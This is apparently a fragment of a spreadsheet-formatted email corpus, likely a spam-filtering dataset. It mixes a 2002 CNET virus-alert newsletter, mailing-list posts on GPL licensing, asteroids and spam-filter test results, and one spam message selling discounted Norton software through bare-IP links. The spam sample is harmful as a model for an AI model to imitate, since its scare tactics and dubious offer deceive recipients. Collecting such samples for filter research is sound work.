 				&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img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&lt;img src="http://home.cnet.com/i/dp/dd_b.gif" width="160" height="18" border="0"&gt;&lt;br&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 		&lt;tr&gt;&lt;td align=center bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;&lt;br&gt;
 		&amp;nbsp;&lt;br&gt;
 		&lt;!-- right column content --&gt;
 &amp;nbsp;&lt;br&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://home.cnet.com/i/dp/dd_c.gif"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
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section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
 			&lt;td width=10&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=412&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" border="0"&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 17, 2002&lt;/font&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" border="0"&gt;&lt;br&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr valign=top&gt;
 					&lt;td width=76 align=right&gt;
 						&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/66x86_robertv.gif" width=66 height=86&gt;&lt;br&gt;
 						&lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
 						--&lt;A HREF="mailto:robert.vamosi@cnet.com"&gt;Robert Vamosi&lt;/A&gt;&lt;br&gt;Senior Associate Editor&lt;br&gt;CNET Software and Internet Services&lt;/font&gt;&lt;/td&gt;
 					&lt;td width=10&gt;&amp;nbsp;&lt;/td&gt;
 					&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 						&lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 						&lt;font size="-1"&gt;So far, 2002 has been a year marked with variations on earlier
 worms. If you update your antivirus software on a regular basis,
 these new versions of Frethem and Yaha shouldn't be a nuisance.
 But if you haven't updated in a while, these variants--plus the
 continuing threat of Klez.h--should motivate you. In security
 news, a flaw in certain versions of PGP encryption could affect
 Outlook users. Read on to learn whether you're vulnerable.
  &lt;/font&gt;&lt;br&gt;
 						&amp;nbsp;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 			&lt;td width=8&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
 		&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face="Arial, Helvetica"&gt;			
 &lt;img src="http://www.cnet.com/i/nl/sw/HEAD_alerts.psd-1.gif" alt="Alerts" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=93 align=left&gt;
 &lt;tr&gt;&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqN32HwbFUByjw2PB1s79R" &gt;&lt;img src="http://www.cnet.com/i/tt/col/021302broken.jpg" width="85" height="110" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U793ndUQ41PHq15ZNEEZuR" &gt;Frethem.k worm wants to give you a password&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt; An e-mail message that promises to reveal secret information with
 a password is yet another variant from the pesky Frethem worm
 family. Frethem.k, technically known as w32.frethem.k@mm, also
 called Frethem.l by some vendors, uses its own SMTP engine to
 send e-mail using addresses obtained from infected systems. This
 worm does not carry a destructive payload. Mac and Linux users
 are not affected.
 &lt;P&gt;
 &lt;/font&gt;
 &lt;P&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgF78zCVXwcl8jfOfRHHUsR" &gt;Yaha.e screensaver worm spreading&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt; The Yaha.e mass-mailing worm masquerades as a friendly
 screensaver, proving that users worldwide are still opening
 attached files from total strangers. Yaha.e (w32.yaha.e@mm, also
 known as Lentin.e, Yaha.f, and Yaha.g) is a successful variant of
 a worm first seen around Valentine's Day this year. Thankfully,
 this worm does not affect Mac, Linux, or Unix users.
 &lt;P&gt;
 &lt;/font&gt;
 &lt;P&gt;
 &lt;P&gt;
 &lt;img src="http://www.cnet.com/i/nl/sw/RHC_news.psd-1.gif" alt="News" width="150" height="20" border="0"&gt;&lt;br&gt;
 &lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFhjXSWREfbQq-Kh1XhaZR" &gt;Leaky PGP Outlook plug-in &lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;PGP 7.03 and 7.04, widely used plug-ins for Microsoft's Outlook
 e-mail client, inadvertently weakens security and leaves the mail
 program open to attack. Fortunately, there is a patch available.
 &lt;/font&gt;
 &lt;P&gt;
 &lt;!--&lt;IMG height=20 alt="Software Mailbag" src="http://a.r.tv.com/cnet.1d/i/nl/sw/rhc_mail.gif" width=150 border=0 NOSEND="1"&gt;
 &lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0skaAw31DvuUJ5QddfWmTdR" &gt;Are Web-based e-mail accounts less virus-prone than Outlook?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;&gt;Is it true that if I use a Web-based e-mail service such as&lt;BR&gt; 
 &gt;Yahoo I'll be safe from Outlook-related viruses? --Charles M.&lt;BR&gt;
 &lt;P&gt;
 No. Many new viruses do not require a PC-based e-mail client such
 as Outlook in order to spread. These new viruses, including 
 Klez, have their own e-mail client (SMTP) and can find e-mail
 addresses within cached Web pages on an infected machine,
 bypassing the need to use Outlook's Address Book. Larger
 Web-based e-mail services, such as Hotmail and Yahoo Mail, screen
 mail hosted on their sites for viruses, but there's no beating
 having a good antivirus product on your desktop just in case.
 &lt;/font&gt;--&gt;
 &lt;br&gt;&lt;img src="http://home.cnet.com/b.gif" width="410" height="5" border="0"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=09-joDSIj88OJFwid8LYSS7ZMgtY8cR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWhRb77CPqEsB8LE27qdRR"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href="http://clickthru.online.com/Click?q=33-vUjnINjX0Emwshgz6yClxb-7XsFR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSmiU90gIVX4RVXFO5JSrR"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href="http://clickthru.online.com/Click?q=5e-ssGdIn065ayIdlshsnStcVTQzciR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtEqr99nqT8UEE0WNrUZlR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKxbqHeSXm-rU358atSBb9R" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0ueCRzmRuuKLvd75wKZzuR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX0aTcWeIO7jM2cmpxUCPusR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWulnwpn7NWtUoF24wxeZR"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&lt;!--Horizontal Brick
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 
 NOSEND="1"&gt;&lt;BR&gt; &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt; &lt;BR&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;&lt;TBODY&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
  &lt;UL&gt;
         &lt;LI&gt;&lt;A 
         href="http://www.tech24.com/cnet.asp?tag=st.nl.horizontal.xpro-txt.ba_th"&gt;Live tech help: submit your question now&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://news.com.com/1200-1120-933954.html?tag=st.nl.horizontal.xpro-txt.newsvision"&gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/techjobs/0-7067.html?tag=st.nl.horizontal.xpro-txt.tj"&gt;Find a job you love: more than 1 million postings&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/go/to?tag=st.nl.horizontal.xpro-txt&amp;destURL=http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2868051,00.html"&gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://electronics.cnet.com/electronics/0-9400734-1304-8810525.html?tag=st.nl.horizontal.xpro-txt.ba_ed"&gt;May Editors' Choice Award: Pioneer Home Theater System HTS-910DV&lt;/A&gt; 
 &lt;/LI&gt;&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 End Horizontal Brick--&gt;
 &lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 	&lt;!-- Begin search box --&gt;
 	&lt;center&gt;
 	&lt;table border="0" cellpadding="1" cellspacing="0" width="90%"&gt;&lt;tr&gt;&lt;td bgcolor="#CCCCCC"&gt;
 	&lt;table border=0 cellspacing=0 cellpadding=0 width="100%"&gt;&lt;form method="GET" action="http://home.cnet.com/search/redirector/1,10207,0-0,00.html"&gt;
 	&lt;tr align=center valign=middle bgcolor="#FFFFFF"&gt;
 	&lt;td height=40 align=right nowrap&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td class="f"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;Search&lt;/b&gt;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
 	&lt;td align=left&gt;&lt;input type="Text" class="f" name="qt" size="18" maxlength="255"&gt;&lt;/td&gt;
 	&lt;td&gt;&amp;nbsp;&lt;select name="tg"&gt;&lt;option value="sw-8888" selected&gt;In Software&lt;option value="nw"&gt;All CNET&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;option value="wb"&gt;The Web&lt;/select&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
 	&lt;td&gt;&amp;nbsp;&lt;input name='search' type='submit' class='f' value=' Go! '&gt;&amp;nbsp;
 	&lt;input type="hidden" name="tt" value="st.sw.8888.sbsr"&gt;&lt;/td&gt;
 	&lt;/tr&gt;&lt;/form&gt;
 	&lt;/table&gt; 
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 	&lt;/center&gt;  
 	&lt;!-- End search box --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- Thin grey line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width=599 bgcolor="#CCCCCC"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;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width=600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href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTGwOlvzGZP85eXsJh-uR" &gt;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HREF="http://clickthru.online.com/Click?q=f2-OZ_TrXwDRlHtO_ABBg_z6Iyim9eMm9RR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvhaOumBiqzUbrvLkiDZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T12_OlBn9kgGa2oXqGdR"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href="http://clickthru.online.com/Click?q=31-V_YRIjMsV6Ypq0FyLxjkqVAXXbcR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpD4Bqrj9Qa1cN0535V0YiR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDBUF5b1NxCjjvDSwizzlR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6DGdVgExKns2asfI8Uk4R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQokoQVyCaf70SVbToBBuR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBaJXosV-Figi7yr9FKgsR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e461&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=b1-YzzzJ-x0nIp9RPY66tnQmlHWbPRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Attn: PROTECT YOURSELF AGAINST HARMFUL VIRUSES! SONLSNAIK
</t>
  </si>
  <si>
    <t xml:space="preserve">Here is an excerpt from your local newspaper. 
 A recent interview with a curious Computer User:
 Q: Is my computer supposed run this slow?
 A: NO, your computer should be as fast as the day you purchased it.
    The solution to your problem is NORTON SYSTEMWORKS 2002.
 Q: I think have a Virus, what do I do?
 A: QUICK! Before the virus spreads and infects your entire system
    you must get a copy of NORTON SYSTEMWORKS 2002!
 Q: I am worried that I may lose my data if my computer crashes, how
    do I backup my data safely and EASILY?
 A: Everything for your data backup is included in NORTON SYSTEMWORKS 2002.
 Q: I occasionally need to send a fax with my computer, what will make
    this EASIER for me?
 A: Winfax, the easiest to use fax software available is also included
    in NORTON SYSTEMWORKS 2002!
 Q: This Systemworks 2002 sounds like it does ALOT for my computer, can
    anyone use this software?
 A: Yes, it is EASY to use and tech support is included.
    NORTON SYSTEMWORKS 2002 is the best software available on the market
    and helps you and your PC have a better relationship!
 Q: Ok, but wait, it must cost a TON of money, right?
 A: Well, usually yes, -BUT- this is a SPECIAL OFFER. It sells at your local
    computer store for $99 but it is available for a LIMITED TIME for 
    ONLY $29.99 &amp; FREE SHIPPING!!!!
 Q: WHAT A DEAL! So, HOW DO I ORDER?
 A: To Order, Click HERE -&gt; http://168.75.161.77/systemworkse123.htm &lt;-
 Q: GREAT, THANKS!
 Q: One more question, how do I get REMOVED from this DARN EMAIL LIST?
 A: That is NOT a problem. Click here -&gt; http://168.75.161.77/removeme.html
    And you will be removed within the legal period of 5 business days.
 ISAPP opp code djT*&amp;204
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] The Coming Firestorm
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; So now Osama bin Laden is Hitler. And Saddam Hussein is Hitler. And
 &gt; George Bush is fighting the Nazis. 
 Someone should shout "Godwin!" at him at a press conference.  Then he'd have to 
 shut up.  Or does that only work on Usenet?
 Stew
 -- 
 Stewart Smith
 Scottish Microelectronics Centre, University of Edinburgh.
 http://www.ee.ed.ac.uk/~sxs/
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Paul, my apologies for being irritable on the subject.  I'll tone down
 the rhetoric.
 Quoting Paul Linehan (plinehan@yahoo.com):
 &gt; Indeed - that I actually had understood prior to all this - for
 &gt; example commercial entities with trial/limited/crippled editions. 
 &gt; 
 &gt; Which is no problem - I don't see why that should be a problem for
 &gt; SuSE though - surely the more the merrrier as far as they're
 &gt; concerned.
 Anything either you or I have to say about their motivation is
 speculation.  Bearing that disclaimer in mind, here's mine:  They make
 money from selling boxed sets.  They're glad to make some versions
 available for almost-unrestricted distribution (not "for value") via CD
 duplication or the Internet that they estimate won't substitute for
 boxed-set sales.
 For example, they _could_ have packaged what I call the "FTP edition" 
 in ISO9660 images.  The fact that they didn't suggests to me that they
 see the inconvenience of mirroring FTP Edition i386 files (which, at the
 moment, are v. 8.0) as motivation for all but the really determined to
 buy boxed sets, instead.  
 Likewise, they _could_ release a v. 8.0 (current) version of the
 "evaluation" single-disk ISO image.  Instead, they always keep it
 several versions behind.  This again seems like an incentive to buy a
 boxed set, after "evaluating" SuSE via the ISO image.
 Again, the above is my speculation (only) about their motivations.  All
 we know of a certainty is what permissions they've granted, which are a
 bit messy and complex, but nonetheless quite clear.
 Those permissions, as a reminder, apply to the SuSE-produced components,
 YaST, YaST2, the distribution installer program, and possibly other
 utilities that I don't know of.  _They_ wrote that code, and have every
 right to grant or withhold permissions as suit them best.
 &gt; One can suspect what one likes. What I didn't understand was that SuSE
 &gt; had proprietary extensions that it wasn't prepared to allow people to
 &gt; use under the GPL or even under  a FreeBSD style licence.
 Hmm, let's slow down, here:  There's a persistent misconception that
 it's possible to place somebody else's work under a new licence without
 his permission.  Not so.  There is nothing in copyright law that would
 make that possible.
 The copyright _owner_ has inherent rights in his (e.g., software) work,
 and is entitled to issue as many _instances_ of his code under diverse
 licences as he wishes.  (If he gives you a copy with no licence
 statement, there's effectively a default licence by operation of
 copyright law.  To avoid going into a long digression, let me just say
 that it's a proprietary licence by default.  That's why, in order to
 have open source software at all, there must be an explicit licence
 from the copyright holder.)
 No Linux distribution _ever_ entails relicensing people's software
 without their explicit permission -- since no such relicensing can occur
 at all. 
 You cannot get away with taking SuSE Linux AG's work and redistributing
 it under what you claim to be a BSD licence, or the GPL, or anything at
 all other than what the copyright owner has specified, because you
 simply lack the right to do so.  Claiming to do it would be copyright
 violation.
 &gt; I thought that the model for the likes of SuSE was selling support and
 &gt; customisation, rather than what I thought of as the core "product". I
 &gt; thought that the likes of Yast came under core - maybe it worked in
 &gt; the glory days before, say, 2001 - I can understand that they might
 &gt; want to make more money, but the way in which they have done it, seems
 &gt; to me, to be be against the spirit of the GPL.
 If Stallman and friends at the GPL (let alone Linus Torvalds and kernel
 contributors) had intended to prohibit putting GPLed works on the same
 CDs as proprietary ones, and selling the result only via retail stores
 (plus mail order, etc.) in shrink-wrapped boxes, I'm 100% certain they
 could and would have done so.
 Guess what?  They did not.  They didn't even require that anybody give
 you copies of the GPLed components, ever, at all.  All they did was
 require that _if_ you received GPLed software lawfully, then you had to 
 be able to get matching source code for a limited period, upon request.
 Spirit of the GPL, you say?  I'd suggest that Stallman and company knew
 exactly what they were doing, and that the degree of access to GPLed
 software is exactly what they had in mind.
 &gt; All I want is the OS and GNU apps. I was under the impression that for
 &gt; *_those_* all one needed was to pay for the media and not for the code
 &gt; itself?
 &gt; 
 &gt; Ai-je tort?
 Mais si.
 You are indeed under a misconception, and may want to read the text of
 the GPL to verify this fact.  The GPL does _not_ entitle you to a copy
 of any binary software.  Section 2 provides for rights to access to
 matching source code _if_ you have lawfully received a copy of a covered
 binary.  That section provides three alternative mechanisms for the
 distributor to provide such access.  And SuSE _do_ actually provide 
 exactly that access.
 Or so I think to be the case.  If you believe there's some GPLed
 codebase that you can lawfully receive from SuSE whose matching source
 code they are not making available exactly as required, please tell us
 which codebase that is.  (That would be SuSE Linux AG's headache, not
 any of ours, but it might be interesting to examine.)
 &gt; My understanding was that binaries or whatever could be received for
 &gt; the cost of the media plus a token of one's appreciation (the latter
 &gt; being subject to agreement between the parties) - I was offering a
 &gt; bottle of wine plus maybe a pint or two and a chat for a copy - I
 &gt; don't know what the going rate is.
 Your understanding is almost correct, but not quite.  (1) The access
 provisions of the GPL concern access to _source code_, not binaries.
 (2) It kicks in _only_ for people who've lawfully received covered
 binaries.  (3) _Covered_ software means instances of codebases actually
 placed under the GNU GPL by their copyright owners.  The mere act of 
 placing a piece of software on a CD-ROM with GPLed software doesn't GPL
 it.
 In fact, the assertion to the contrary is a favourite FUD tactic from
 enemies of Linux:  They're forever trying to convince software producers
 that using GPLed software in any way with their proprietary offerings
 will "taint" their copyrights and force them to put their property under
 the GPL.  It's simply not so.
 &gt; If I wanted support from SuSE, that would be a different issue, and
 &gt; one for which I would be willing to pay.
 That's nice, but they're not _offering_ the exact contents of the boxed
 sets free of charge and lawful to duplicate &amp; redistribute, or "borrow".
 For one thing, as you will have noticed from my earlier listing of
 components, the boxed sets' CD-ROMs include quite a lot of _third-party_
 proprietary software.  SuSE Linux AG _cannot_ allow you (or your friend)
 to hand out copies of that software freely, because it's not theirs in
 the first place.
 &gt; I have a friend with 7.3 - I think that I'll end up doing that!
 If you mean the 3-CD core set of RH 7.3, good.  It's a quite decent
 distribution.  But bear in mind that the RH 7.3 boxed sets include
 some other third-party applications whose owners would be very upset to
 find them being copied or "borrowed". 
 &gt; I have now realised this, thanks to your kind explanations. I can
 &gt; borrow them, but not copy them? 
 No.
 Look, it's a collection of software, many elements of which may not be
 lawfully just given out to multiple people:  Your friend installing it,
 then _not_ erasing it but merely letting you "borrow" the CDs results in
 the product being installed in multiple places.  That's unauthorised
 copying.
 &gt; And, as I've tried to explain, is not the licence terms on, say,
 &gt; trials for commercial company x to which I object, it is the way SuSE
 &gt; appears, at least to my I.T. peasant self, to have mixed up
 &gt; proprietary and open stuff.
 Well, if you don't like SuSE, then you probably won't like Caldera
 eDesk, Xandros Desktop, Lycoris Deskop LX, Libranet, Lindows, or KRUD,
 either.  Depending on your criteria, you also might not like Red Hat,
 Linux-Mandrake, or Yellow Dog, since all of those have boxed-set retail
 sets that include CD-ROMs that may not be publicly redistributed.
 (I don't even use SuSE.  I'm just trying to clarify the licensing
 question.)
 -- 
 Cheers,                                             Live Faust, die Jung.
 Rick Moen
 rick@linuxmafia.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Jon O &lt;jono@networkcommand.com&gt; writes:
     J&gt; So, my theory is that if these near earth rocks are increasing
     J&gt; so does our chance of discovering the last three were part of a
     J&gt; swarm of 15 of which 10, 11 and 12 may hit.
 To actually answer the question, each of the last three reports was
 hurling down a different "tube" so, no, they are not related, but yes,
 each tube contains an uneven distribution of stuff that only /peaks/
 near the biggest chunks.  It would actually be pretty amazing to find
 any repeat visitor still in one piece after it's solar perigee.  Space
 in that neighbourhood is warped like a cheese-grater.  We can expect
 one (or more) really big mother(s), surrounded by lots of cute little
 'uns smeared out in the crest of its gravity wave.
 Another curious artifact of the old-and-periodic rock data is the
 bigger rocks are on the outer edge of the tubes: Relativistic effects
 on the redshift/blueshift of the particle solar heating differential
 on either side of each bit slow the smaller less-massive (and more
 easily pushed) particles dropping them into lower orbits ... or at
 least, that's our best theory.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Tim Peters wrote:
 &gt; If you've still got the summary files, please cvs up and try running cmp.py
 &gt; again -- in the process of generalizing cmp.py, you managed to make it skip
 &gt; half the lines &lt;wink&gt;.
 Woops.  I didn't have the summary files so I regenerated them using a
 slightly different set of data.  Here are the results of enabling the
 "received" header processing:
     false positive percentages
         0.707  0.530  won    -25.04%
         0.873  0.524  won    -39.98%
         0.301  0.301  tied
         1.047  1.047  tied
         0.602  0.452  won    -24.92%
         0.353  0.177  won    -49.86%
     won   4 times
     tied  2 times
     lost  0 times
     total unique fp went from 17 to 14 won    -17.65%
     false negative percentages
         2.167  1.238  won    -42.87%
         0.969  0.969  tied
         1.887  1.372  won    -27.29%
         1.616  1.292  won    -20.05%
         1.029  0.858  won    -16.62%
         1.548  1.548  tied
     won   4 times
     tied  2 times
     lost  0 times
     total unique fn went from 50 to 38 won    -24.00%
 My test set is different than Tim's in that all the email was received
 by the same account.  Also, my set contains email sent to me, not to
 mailing lists (I use a different addresses for mailing lists).  If
 people cook up more ideas I will be happy to test them.
   Neil
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sourceforge sells out
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/24.html
 Date: 2002-09-24T02:35:59-08:00
 You are not still using sourceforge, are you? If you have any hopes that they 
 are anything but yet another business giving away a free service, then see 
 this: Selling Microsoft VisualStudio on the "open source development platform". 
 Nice touch. Click on the image for the original screenshot....
</t>
  </si>
  <si>
